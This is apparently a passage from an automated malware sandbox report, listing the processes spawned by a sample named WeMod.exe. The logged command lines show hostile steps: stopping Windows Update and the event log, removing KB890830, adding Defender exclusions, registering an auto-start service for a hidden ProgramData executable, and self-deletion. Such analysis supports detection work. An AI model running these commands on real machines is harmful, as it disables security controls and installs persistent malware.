                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff74f1c0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\wusa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff686f80000
                                                  File size:345'088 bytes
                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe delete "BFFESVJT"
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:29
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:19:34:24
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:32
                                                  Start time:19:34:24
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto"
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:33
                                                  Start time:19:34:24
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:19:34:26
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:35
                                                  Start time:19:34:27
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                  Imagebase:0x7ff6eef20000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:36
                                                  Start time:19:34:42
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                  Imagebase:0x7ff6eef20000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:37
                                                  Start time:19:34:44
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:19:34:44
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe start "BFFESVJT"
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe"
                                                  Imagebase:0x7ff77ec80000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:41
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:43
                                                  Start time:19:34:47
                                                  Start date:29/06/2024
                                                  Path:C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
                                                  Imagebase:0x7ff6ee0a0000
                                                  File size:718'354'208 bytes
                                                  MD5 hash:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\choice.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:choice /C Y /N /D Y /T 3
                                                  Imagebase:0x7ff6c3b30000
                                                  File size:35'840 bytes
                                                  MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:45
                                                  Start time:19:34:48
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                  Imagebase:0x7ff726ad0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:46
                                                  Start time:19:34:48
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:47
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff77ec80000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:48
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:49
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:50
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:51
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\wusa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff7ab630000
                                                  File size:345'088 bytes
                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:52
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:53
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:54
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:55
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:56
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:57
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:58
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:59
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:60
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:61
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:62
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:63
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:64
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:65
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:66
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
